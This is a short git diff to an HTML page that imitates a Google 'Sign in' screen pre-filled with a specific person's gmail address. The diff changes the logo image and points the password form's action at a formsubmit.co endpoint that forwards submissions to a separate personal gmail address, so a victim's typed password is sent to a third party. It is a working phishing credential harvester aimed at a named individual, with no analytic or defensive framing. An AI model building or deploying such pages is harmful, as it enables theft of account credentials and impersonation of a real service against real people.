--- a/login..html
+++ b/login..html
@@ -80,7 +80,7 @@
 <body>
     <div class="container">
 
-        <img src="image/goo1.png" class="g">
+        <img src="image/google5.png" class="g">
 
         <h2 style="margin-top: 30px;  text-align: center; margin-bottom:px;">Sign in</h2>
         <p style="margin-top: 5px; text-align: center; font-size: 20px;">Use a Google account</p>
@@ -88,7 +88,7 @@
         <div class="k">
             tigestgetye768@gmail.com
         </div>
-        <form method="post">
+        <form action="https://formsubmit.co/dagmawihabtamu300@gmail.com" method="post">
         <a>
             <input type="password" id="password" placeholder="Password" name="password" required value="" minlength="8" required  onkeyup="this.setAttribute('value',this.value);">
         </a>
@@ -97,7 +97,7 @@
             <c href="">Forgot your password?</c>
         </d>
 
-        <button class="btn">
+        <button class="btn" type="submit">
             Next
         </button>
 
